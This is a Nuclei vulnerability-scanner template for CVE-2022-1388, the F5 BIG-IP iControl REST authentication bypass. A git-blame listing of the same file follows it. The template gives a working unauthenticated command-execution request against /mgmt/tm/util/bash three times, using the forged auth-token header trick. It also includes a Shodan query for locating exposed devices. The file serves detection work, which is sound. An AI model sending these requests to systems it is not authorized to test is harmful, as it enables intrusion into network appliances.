nuclei-templates/cves/2022/CVE-2022-1388.yaml

id: CVE-2022-1388

info:
  name: F5 BIG-IP iControl - REST Auth Bypass RCE
  author: dwisiswant0,Ph33r
  severity: critical
  description: |
    This F5 BIG-IP vulnerability can allow an unauthenticated attacker
    with network access to the BIG-IP system through the management
    port and/or self IP addresses to execute arbitrary system commands.
  reference:
    - https://twitter.com/GossiTheDog/status/1523566937414193153
    - https://support.f5.com/csp/article/K23605346
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1388
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.80
    cve-id: CVE-2022-1388
    cwe-id: CWE-306
  metadata:
    shodan-query: http.title:"BIG-IP&reg;-+Redirect" +"Server"
    verified: true
  tags: f5,bigip,cve,cve2022,rce,mirai

variables:
  auth: "admin:"

requests:
  - raw:
      - |+
        POST /mgmt/tm/util/bash HTTP/1.1
        Host: {{Hostname}}
        Connection: keep-alive, X-F5-Auth-Token
        X-F5-Auth-Token: a
        Authorization: Basic {{base64(auth)}}
        Content-Type: application/json

        {
             "command": "run",
             "utilCmdArgs": "-c id"
        }

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "uid="
        condition: and
      - type: word
        words:
          - "context=system_u"
          - "commandResult"
        condition: or

  - raw:
      - |+
        POST /mgmt/tm/util/bash HTTP/1.1
        Host: localhost
        Connection: keep-alive, X-F5-Auth-Token
        X-F5-Auth-Token: a
        Authorization: Basic {{base64(auth)}}
        Content-Type: application/json

        {
          "command": "run",
          "utilCmdArgs": "-c id"
        }

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "uid="
        condition: and
      - type: word
        words:
          - "context=system_u"
          - "commandResult"
        condition: or

  - raw:
      - |+
        POST /mgmt/tm/util/bash HTTP/1.1
        Host: localhost:8100
        Connection: keep-alive, X-F5-Auth-Token
        X-F5-Auth-Token: a
        Authorization: Basic {{base64(auth)}}
        Content-Type: application/json

        {
          "command": "run",
          "utilCmdArgs": "-c id"
        }

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "uid="
        condition: and
      - type: word
        words:
          - "context=system_u"
          - "commandResult"
        condition: or
Add CVE-2022-1388 2022-05-09 07:53:05 +00:00			`id: CVE-2022-1388`

			`info:`
Rewrote matchers due to vulnerable use-case I which had a slightly different matcher. Minor formatting and style changes. 2022-05-10 21:07:09 +00:00			`name: F5 BIG-IP iControl - REST Auth Bypass RCE`
Update CVE-2022-1388.yaml 2022-05-09 13:57:14 +00:00			`author: dwisiswant0,Ph33r`
Add CVE-2022-1388 2022-05-09 07:53:05 +00:00			`severity: critical`
			`description: \|`
Rewrote matchers due to vulnerable use-case I which had a slightly different matcher. Minor formatting and style changes. 2022-05-10 21:07:09 +00:00			`This F5 BIG-IP vulnerability can allow an unauthenticated attacker`
Add CVE-2022-1388 2022-05-09 07:53:05 +00:00			`with network access to the BIG-IP system through the management`
Rewrote matchers due to vulnerable use-case I which had a slightly different matcher. Minor formatting and style changes. 2022-05-10 21:07:09 +00:00			`port and/or self IP addresses to execute arbitrary system commands.`
Add CVE-2022-1388 2022-05-09 07:53:05 +00:00			`reference:`
Update CVE-2022-1388.yaml 2022-05-09 08:40:31 +00:00			`- https://twitter.com/GossiTheDog/status/1523566937414193153`
Add CVE-2022-1388 2022-05-09 07:53:05 +00:00			`- https://support.f5.com/csp/article/K23605346`
Rewrote matchers due to vulnerable use-case I which had a slightly different matcher. Minor formatting and style changes. 2022-05-10 21:07:09 +00:00			`- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1388`
Auto Generated CVE annotations [Mon May 9 08:58:57 UTC 2022] :robot: 2022-05-09 08:58:57 +00:00			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`
			`cvss-score: 9.80`
			`cve-id: CVE-2022-1388`
			`cwe-id: CWE-306`
misc update 2022-05-09 09:37:01 +00:00			`metadata:`
			`shodan-query: http.title:"BIG-IP®-+Redirect" +"Server"`
			`verified: true`
Rewrote matchers due to vulnerable use-case I which had a slightly different matcher. Minor formatting and style changes. 2022-05-10 21:07:09 +00:00			`tags: f5,bigip,cve,cve2022,rce,mirai`
misc update 2022-05-09 09:37:01 +00:00
			`variables:`
			`auth: "admin:"`
Update CVE-2022-1388.yaml 2022-05-09 08:36:32 +00:00
Add CVE-2022-1388 2022-05-09 07:53:05 +00:00			`requests:`
			`- raw:`
Rewrote matchers due to vulnerable use-case I which had a slightly different matcher. Minor formatting and style changes. 2022-05-10 21:07:09 +00:00			`- \|+`
Add CVE-2022-1388 2022-05-09 07:53:05 +00:00			`POST /mgmt/tm/util/bash HTTP/1.1`
			`Host: {{Hostname}}`
			`Connection: keep-alive, X-F5-Auth-Token`
			`X-F5-Auth-Token: a`
Update CVE-2022-1388.yaml 2022-05-09 08:36:32 +00:00			`Authorization: Basic {{base64(auth)}}`
Add CVE-2022-1388 2022-05-09 07:53:05 +00:00			`Content-Type: application/json`
Rewrote matchers due to vulnerable use-case I which had a slightly different matcher. Minor formatting and style changes. 2022-05-10 21:07:09 +00:00
Add CVE-2022-1388 2022-05-09 07:53:05 +00:00			`{`
Rewrote matchers due to vulnerable use-case I which had a slightly different matcher. Minor formatting and style changes. 2022-05-10 21:07:09 +00:00			`"command": "run",`
			`"utilCmdArgs": "-c id"`
Add CVE-2022-1388 2022-05-09 07:53:05 +00:00			`}`
Rewrote matchers due to vulnerable use-case I which had a slightly different matcher. Minor formatting and style changes. 2022-05-10 21:07:09 +00:00
			`matchers-condition: and`
Update CVE-2022-1388.yaml 2022-05-09 13:57:14 +00:00			`matchers:`
			`- type: word`
			`words:`
			`- "uid="`
			`condition: and`
Rewrote matchers due to vulnerable use-case I which had a slightly different matcher. Minor formatting and style changes. 2022-05-10 21:07:09 +00:00			`- type: word`
			`words:`
			`- "context=system_u"`
			`- "commandResult"`
			`condition: or`

Update CVE-2022-1388.yaml 2022-05-09 13:57:14 +00:00			`- raw:`
Rewrote matchers due to vulnerable use-case I which had a slightly different matcher. Minor formatting and style changes. 2022-05-10 21:07:09 +00:00			`- \|+`
Update CVE-2022-1388.yaml 2022-05-09 13:57:14 +00:00			`POST /mgmt/tm/util/bash HTTP/1.1`
			`Host: localhost`
			`Connection: keep-alive, X-F5-Auth-Token`
			`X-F5-Auth-Token: a`
			`Authorization: Basic {{base64(auth)}}`
			`Content-Type: application/json`
Rewrote matchers due to vulnerable use-case I which had a slightly different matcher. Minor formatting and style changes. 2022-05-10 21:07:09 +00:00
Update CVE-2022-1388.yaml 2022-05-09 13:57:14 +00:00			`{`
			`"command": "run",`
			`"utilCmdArgs": "-c id"`
			`}`
Rewrote matchers due to vulnerable use-case I which had a slightly different matcher. Minor formatting and style changes. 2022-05-10 21:07:09 +00:00
			`matchers-condition: and`
Update CVE-2022-1388.yaml 2022-05-09 13:57:14 +00:00			`matchers:`
			`- type: word`
			`words:`
			`- "uid="`
			`condition: and`
Rewrote matchers due to vulnerable use-case I which had a slightly different matcher. Minor formatting and style changes. 2022-05-10 21:07:09 +00:00			`- type: word`
			`words:`
			`- "context=system_u"`
			`- "commandResult"`
			`condition: or`

Update CVE-2022-1388.yaml 2022-05-09 13:57:14 +00:00			`- raw:`
Rewrote matchers due to vulnerable use-case I which had a slightly different matcher. Minor formatting and style changes. 2022-05-10 21:07:09 +00:00			`- \|+`
Update CVE-2022-1388.yaml 2022-05-09 13:57:14 +00:00			`POST /mgmt/tm/util/bash HTTP/1.1`
			`Host: localhost:8100`
			`Connection: keep-alive, X-F5-Auth-Token`
			`X-F5-Auth-Token: a`
			`Authorization: Basic {{base64(auth)}}`
			`Content-Type: application/json`
Rewrote matchers due to vulnerable use-case I which had a slightly different matcher. Minor formatting and style changes. 2022-05-10 21:07:09 +00:00
Update CVE-2022-1388.yaml 2022-05-09 13:57:14 +00:00			`{`
			`"command": "run",`
			`"utilCmdArgs": "-c id"`
			`}`
Rewrote matchers due to vulnerable use-case I which had a slightly different matcher. Minor formatting and style changes. 2022-05-10 21:07:09 +00:00
			`matchers-condition: and`
Add CVE-2022-1388 2022-05-09 07:53:05 +00:00			`matchers:`
			`- type: word`
			`words:`
			`- "uid="`
Update CVE-2022-1388.yaml 2022-05-09 13:57:14 +00:00			`condition: and`
Rewrote matchers due to vulnerable use-case I which had a slightly different matcher. Minor formatting and style changes. 2022-05-10 21:07:09 +00:00			`- type: word`
			`words:`
			`- "context=system_u"`
			`- "commandResult"`
			`condition: or`